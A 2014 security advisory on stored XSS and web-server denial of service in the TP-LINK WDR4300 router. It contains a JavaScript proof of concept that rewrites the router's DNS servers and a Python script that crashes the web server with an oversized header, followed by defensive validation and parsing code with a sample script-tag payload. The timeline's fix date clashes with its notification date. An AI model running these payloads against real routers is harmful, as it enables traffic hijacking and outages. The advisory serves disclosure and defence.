TP-LINK WDR4300 XSS / Denial Of Service

22 Sep 2014 00:00:00 | Reported by Oz Elisyan | Type: packetstorm | Source: packetstormsecurity.com

TP-LINK WDR4300 vulnerable to XSS and DoS attacks; patched in firmware 140916.

`Advisory Information  
===============  
  
Vendors Contacted: TP-LINK  
Vendor Patched: Yes, Firmware 140916  
System Affected: N750 Wireless Dual Band Gigabit Router (TL-WDR4300), might affect others.  
Versions Affected: 130617, possibly earlier  
CVE Numbers Assigned: CVE-2014-4727, CVE-2014-4728  
  
  
Vulnerabilities Description  
===================  
  
# Stored XSS -  
  
It is possible to inject JavaScript code via the DHCP hostname field.  
If the administrator visits the DHCP clients page (web panel),  
the script will execute.  
  
# DoS (web server) -  
A denial-of-service condition can be triggered in the device's web server: remotely or locally, send the  
device a "GET" request with an extra "Header" with a long value (A x 3000 times).  
  
  
Proof of Concept:  
============  
  
http://elisyan.com/tplink/wdr4300.html  
  
---- start wdr4300.html ----  
/*  
Author: Oz Elisyan  
Title: TP-LINK WDR4300 XSS to CSRF (the device has Referer check)  
*/  
  
  
  
var xmlhttp;  
if (window.XMLHttpRequest)  
{// code for IE7+, Firefox, Chrome, Opera, Safari  
xmlhttp=new XMLHttpRequest();  
}  
else  
{// code for IE6, IE5  
xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");  
}  
xmlhttp.onreadystatechange=function()  
{  
if (xmlhttp.readyState==4 && xmlhttp.status==200)  
{  
document.getElementById("myDiv").innerHTML=xmlhttp.responseText;  
}  
}  
xmlhttp.open("GET","/userRpm/WanDynamicIpCfgRpm.htm?wan=0&mtu=1500&manual=2&dnsserver=X.X.X.X&dnsserver2=X.X.X.X&hostName=&Save=Save",true);  
xmlhttp.send();  
  
  
  
---- end wdr4300.html ----  
  
http://elisyan.com/tplink/wdr4300.py  
  
---- start wdr4300.py ----  
#Author: Oz Elisyan  
#TP-Link WDR4300 DoS PoC  
  
import httplib  
  
conn = httplib.HTTPConnection("192.168.0.1")  
headers = {"Content-type": "application/x-www-form-urlencoded",  
"Accept": "text/plain", "DoS": "A" * 3000}  # extra header with a long value (A x 3000 times)  
conn.request("GET","/", "Let me tell you something", headers)  
  
print "Done"  
  
---- end wdr4300.py ----  
  
  
Report Timeline:  
===========  
  
2014-07-04:  
Vendor notified about the vulnerabilities with all the relevant technical information.  
  
2013-09-16:  
Vendor released a fix.  
  
Credits:  
======  
  
The vulnerabilities were discovered by Oz Elisyan.  
  
  
References:  
========  
  
http://www.tp-link.com/lk/products/details/?model=TL-WDR4300  
`
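
The stored XSS described in the advisory comes from a client-supplied DHCP hostname reaching the admin page as markup. The following is an added example, not code from the advisory or from TP-LINK firmware: it shows a hypothetical vulnerable rendering next to a hardened one that validates the hostname (RFC 1123 syntax) and HTML-encodes it on output. The lease records, function names and the rendering pattern are assumptions.

```python
import html
import re

# RFC 1123 label: letters, digits, hyphens; 1-63 chars; no leading/trailing hyphen.
_LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")

# Constructed sample leases; the second hostname carries markup (constructed value).
LEASES = [
    {"hostname": "laptop-01", "mac": "00:11:22:33:44:55", "ip": "192.168.0.100"},
    {"hostname": "<script src=//example.invalid/x.js></script>",
     "mac": "66:77:88:99:AA:BB", "ip": "192.168.0.101"},
]

def is_valid_hostname(name):
    """Syntactic RFC 1123 check for a client-supplied DHCP hostname."""
    if not name or len(name) > 253:
        return False
    return all(_LABEL.fullmatch(label) for label in name.split("."))

def suspicious_leases(leases):
    """Leases whose hostname is not a plain hostname; worth alerting on."""
    return [l for l in leases if not is_valid_hostname(l["hostname"])]

def render_unsafe(leases):
    """Hypothetical vulnerable pattern: hostname concatenated into markup."""
    return "".join("<tr><td>%s</td><td>%s</td></tr>" % (l["hostname"], l["ip"])
                   for l in leases)

def render_safe(leases):
    """Validate on input, then encode on output; both layers are kept."""
    rows = []
    for l in leases:
        name = l["hostname"] if is_valid_hostname(l["hostname"]) else "(invalid hostname)"
        rows.append("<tr><td>%s</td><td>%s</td></tr>"
                    % (html.escape(name, quote=True), html.escape(l["ip"], quote=True)))
    return "".join(rows)

if __name__ == "__main__":
    print(render_safe(LEASES))
    print([l["mac"] for l in suspicious_leases(LEASES)])
```

The same `is_valid_hostname` check can be run over a DHCP lease export to flag clients that announced a non-hostname value.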

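For the web-server DoS described in the advisory (a GET request with one very long header value), the usual mitigation is a hard size limit applied while the request head is being read. The following is an added example, not code from the advisory or the firmware: a bounded request-head parser that answers an oversized header with 431 instead of processing it. The limits, names and sample requests are assumptions.

```python
import io

MAX_LINE = 1024     # assumed per-line limit in bytes, request line included
MAX_HEADERS = 32    # assumed limit on header count

def parse_request_head(stream, max_line=MAX_LINE, max_headers=MAX_HEADERS):
    """Parse request line and headers from a binary stream with hard limits.

    Returns (status, headers): 200 when well formed, 414 for an oversized
    request line, 431 for an oversized header or too many headers, 400 otherwise.
    """
    # readline(n) never returns more than n bytes, so memory use stays bounded.
    request_line = stream.readline(max_line + 1)
    if len(request_line) > max_line:
        return 414, {}
    if not request_line.endswith(b"\n") or len(request_line.split()) != 3:
        return 400, {}
    headers = {}
    while True:
        line = stream.readline(max_line + 1)
        if len(line) > max_line:
            return 431, {}
        if not line.endswith(b"\n"):
            return 400, {}          # stream ended before the blank line
        if line in (b"\r\n", b"\n"):
            return 200, headers
        if len(headers) >= max_headers:
            return 431, {}
        name, sep, value = line.partition(b":")
        if not sep or not name.strip():
            return 400, {}
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")

# Constructed requests: one ordinary, one with a 3000-byte header value.
NORMAL = b"GET / HTTP/1.1\r\nHost: 192.168.0.1\r\nAccept: text/plain\r\n\r\n"
OVERSIZED = b"GET / HTTP/1.1\r\nHost: 192.168.0.1\r\nX-Long: " + b"A" * 3000 + b"\r\n\r\n"

if __name__ == "__main__":
    print(parse_request_head(io.BytesIO(NORMAL)))
    print(parse_request_head(io.BytesIO(OVERSIZED))[0])
```

After a 414 or 431 the rest of the request is left unread, so the caller should send the error response and close the connection rather than reuse it.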